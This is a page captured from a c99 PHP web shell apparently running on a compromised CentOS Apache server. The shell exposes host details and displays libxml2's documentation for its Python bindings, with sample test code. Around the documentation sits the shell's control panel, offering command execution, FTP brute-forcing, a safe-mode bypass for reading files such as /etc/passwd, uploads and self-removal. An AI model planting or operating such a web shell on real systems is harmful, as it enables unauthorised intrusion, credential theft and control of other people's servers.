!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/libxml2-python-2.6.26/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     python.html (19.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Python and bindings
Action against software patentsGnome2 LogoW3C LogoRed Hat Logo
Made with Libxml2 Logo

The XML C parser and toolkit of Gnome

Python and bindings

Developer Menu
API Indexes
Related links

There are a number of language bindings and wrappers available forlibxml2,the list below is not exhaustive. Please contact the xml-bindings@gnome.org(archives) inorder toget updates to this list or to discuss the specific topic of libxml2orlibxslt wrappers or bindings:

  • Libxml++seemsthemost up-to-date C++ bindings for libxml2, check the documentationandthe examples.
  • There is another C++wrapperbased on the gdome2 bindingsmaintained by Tobias Peters.
  • and a third C++ wrapper by Peter Jones <pjones@pmade.org>

    Website: http://pmade.org/pjones/software/xmlwrapp/

  • MattSergeantdevelopedXML::LibXSLT, a Perl wrapperforlibxml2/libxslt as part of the AxKitXMLapplication server.
  • If you're interested into scripting XML processing, have a look at XSHan XML editing shell basedonLibxml2 Perl bindings.
  • Dave Kuhlmanprovidesanearlier version of the libxml/libxslt wrappers for Python.
  • Gopal.V and Peter Minten develop libxml#, a setofC# libxml2 bindings.
  • Petr Kozelka provides Pascal units togluelibxml2with Kylix, Delphi and other Pascal compilers.
  • Uwe Fechner also provides idom2, aDOM2implementation for Kylix2/D5/D6 from Borland.
  • There is bindings forRubyand libxml2 bindings are also available in Ruby through the libgdome-rubymodulemaintainedby Tobias Peters.
  • Steve Ball and contributors maintains libxml2 and libxslt bindingsforTcl.
  • libxml2 and libxslt is the default XML library for PHP5.
  • LibxmlJisaneffort to create a 100% JAXP-compatible Java wrapper for libxml2andlibxslt as part of GNU ClasspathX project.
  • Patrick McPhee provides Rexx bindings fof libxml2 and libxslt, lookforRexxXML.
  • SatimageprovidesXMLLibosax.This is an osax for Mac OS X with a set of commands toimplement inAppleScript the XML DOM, XPATH and XSLT. Also includescommands forProperty-lists (Apple's fast lookup table XML format.)
  • Francesco Montorsi developped wxXml2wrappersthat interface libxml2, allowing wxWidgets applications toload/save/editXML instances.

The distribution includes a set of Python bindings, which are guaranteedtobe maintained as part of the library in the future, though thePythoninterface have not yet reached the completeness of the C API.

Note that some of the Python purist dislike the default set ofPythonbindings, rather than complaining I suggest they have a look at lxml the more pythonic bindings forlibxml2and libxsltand helpMartijnFaassencomplete those.

StéphaneBidoulmaintains aWindows portof the Python bindings.

Note to people interested in building bindings, the API is formalized asan XML API description filewhich allows toautomatea large part of the Python bindings, this includes functiondescriptions,enums, structures, typedefs, etc... The Python script used tobuild thebindings is python/generator.py in the source distribution.

To install the Python bindings there are 2 options:

  • If you use an RPM based distribution, simply install the libxml2-pythonRPM(andif needed the libxslt-pythonRPM).
  • Otherwise use the libxml2-pythonmoduledistributioncorresponding to your installed version oflibxml2 andlibxslt. Note that to install it you will need both libxml2and libxsltinstalled and run "python setup.py build install" in themodule tree.

The distribution includes a set of examples and regression tests forthepython bindings in the python/testsdirectory. Here aresomeexcerpts from those tests:

tst.py:

This is a basic test of the file interface and DOM navigation:

import libxml2, sys

doc = libxml2.parseFile("tst.xml")
if doc.name != "tst.xml":
    print "doc.name failed"
    sys.exit(1)
root = doc.children
if root.name != "doc":
    print "root.name failed"
    sys.exit(1)
child = root.children
if child.name != "foo":
    print "child.name failed"
    sys.exit(1)
doc.freeDoc()

The Python module is called libxml2; parseFile is the equivalentofxmlParseFile (most of the bindings are automatically generated, and thexmlprefix is removed and the casing convention are kept). All node seen atthebinding level share the same subset of accessors:

  • name: returns the node name
  • type: returns a string indicating the node type
  • content: returns the content of the node, it is basedonxmlNodeGetContent() and hence is recursive.
  • parent, children,last,next, prev,doc,properties: pointing to the associatedelement in the tree,those may return None in case no such linkexists.

Also note the need to explicitly deallocate documents with freeDoc().Reference counting for libxml2 trees would need quite a lot of worktofunction properly, and rather than risk memory leaks if notimplementedcorrectly it sounds safer to have an explicit function to free atree. Thewrapper python objects like doc, root or child are themautomatically garbagecollected.

validate.py:

This test check the validation interfaces and redirection oferrormessages:

import libxml2

#deactivate error messages from the validation
def noerr(ctx, str):
    pass

libxml2.registerErrorHandler(noerr, None)

ctxt = libxml2.createFileParserCtxt("invalid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
doc.freeDoc()
if valid != 0:
    print "validity check failed"

The first thing to notice is the call to registerErrorHandler(), itdefinesa new error handler global to the library. It is used to avoid seeingtheerror messages when trying to validate the invalid document.

The main interest of that test is the creation of a parser contextwithcreateFileParserCtxt() and how the behaviour can be changed beforecallingparseDocument() . Similarly the informations resulting from theparsing phaseare also available using context methods.

Contexts like nodes are defined as class and the libxml2 wrappers mapstheC function interfaces in terms of objects method as much as possible.Thebest to get a complete view of what methods are supported is to look atthelibxml2.py module containing all the wrappers.

push.py:

This test show how to activate the push parser interface:

import libxml2

ctxt = libxml2.createPushParser(None, "<foo", 4, "test.xml")
ctxt.parseChunk("/>", 2, 1)
doc = ctxt.doc()

doc.freeDoc()

The context is created with a special call based onthexmlCreatePushParser() from the C library. The first argument is anoptionalSAX callback object, then the initial set of data, the length and thename ofthe resource in case URI-References need to be computed by theparser.

Then the data are pushed using the parseChunk() method, the lastcallsetting the third argument terminate to 1.

pushSAX.py:

this test show the use of the event based parsing interfaces. In thiscasethe parser does not build a document, but provides callback informationasthe parser makes progresses analyzing the data being provided:

import libxml2
log = ""

class callback:
    def startDocument(self):
        global log
        log = log + "startDocument:"

    def endDocument(self):
        global log
        log = log + "endDocument:"

    def startElement(self, tag, attrs):
        global log
        log = log + "startElement %s %s:" % (tag, attrs)

    def endElement(self, tag):
        global log
        log = log + "endElement %s:" % (tag)

    def characters(self, data):
        global log
        log = log + "characters: %s:" % (data)

    def warning(self, msg):
        global log
        log = log + "warning: %s:" % (msg)

    def error(self, msg):
        global log
        log = log + "error: %s:" % (msg)

    def fatalError(self, msg):
        global log
        log = log + "fatalError: %s:" % (msg)

handler = callback()

ctxt = libxml2.createPushParser(handler, "<foo", 4, "test.xml")
chunk = " url='tst'>b"
ctxt.parseChunk(chunk, len(chunk), 0)
chunk = "ar</foo>"
ctxt.parseChunk(chunk, len(chunk), 1)

reference = "startDocument:startElement foo {'url': 'tst'}:" + \ 
            "characters: bar:endElement foo:endDocument:"
if log != reference:
    print "Error got: %s" % log
    print "Expected: %s" % reference

The key object in that test is the handler, it provides a number ofentrypoints which can be called by the parser as it makes progresses toindicatethe information set obtained. The full set of callback is larger thanwhatthe callback class in that specific example implements (see theSAXdefinition for a complete list). The wrapper will only call those suppliedbythe object when activated. The startElement receives the names of theelementand a dictionary containing the attributes carried by this element.

Also note that the reference string generated from the callback showsasingle character call even though the string "bar" is passed to theparserfrom 2 different call to parseChunk()

xpath.py:

This is a basic test of XPath wrappers support

import libxml2

doc = libxml2.parseFile("tst.xml")
ctxt = doc.xpathNewContext()
res = ctxt.xpathEval("//*")
if len(res) != 2:
    print "xpath query: wrong node set size"
    sys.exit(1)
if res[0].name != "doc" or res[1].name != "foo":
    print "xpath query: wrong node set value"
    sys.exit(1)
doc.freeDoc()
ctxt.xpathFreeContext()

This test parses a file, then create an XPath context to evaluateXPathexpression on it. The xpathEval() method execute an XPath query andreturnsthe result mapped in a Python way. String and numbers are nativelyconverted,and node sets are returned as a tuple of libxml2 Python nodeswrappers. Likethe document, the XPath context need to be freed explicitly,also not thatthe result of the XPath query may point back to the documenttree and hencethe document must be freed after the result of the query isused.

xpathext.py:

This test shows how to extend the XPath engine with functions writteninpython:

import libxml2

def foo(ctx, x):
    return x + 1

doc = libxml2.parseFile("tst.xml")
ctxt = doc.xpathNewContext()
libxml2.registerXPathFunction(ctxt._o, "foo", None, foo)
res = ctxt.xpathEval("foo(1)")
if res != 2:
    print "xpath extension failure"
doc.freeDoc()
ctxt.xpathFreeContext()

Note how the extension function is registered with the context (butthatpart is not yet finalized, this may change slightly in the future).

tstxpath.py:

This test is similar to the previous one but shows how theextensionfunction can access the XPath evaluation context:

def foo(ctx, x):
    global called

    #
    # test that access to the XPath evaluation contexts
    #
    pctxt = libxml2.xpathParserContext(_obj=ctx)
    ctxt = pctxt.context()
    called = ctxt.function()
    return x + 1

All the interfaces around the XPath parser(or rather evaluation)contextare not finalized, but it should be sufficient to do contextual workat theevaluation point.

Memory debugging:

last but not least, all tests starts with the following prologue:

#memory debug specific
libxml2.debugMemory(1)

and ends with the following epilogue:

#memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
    print "OK"
else:
    print "Memory leak %d bytes" % (libxml2.debugMemory(1))
    libxml2.dumpMemory()

Those activate the memory debugging interface of libxml2 whereallallocated block in the library are tracked. The prologue then cleans upthelibrary state and checks that all allocated memory has been freed. If notitcalls dumpMemory() which saves that list in a .memdumpfile.

Daniel Veillard


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0117 ]--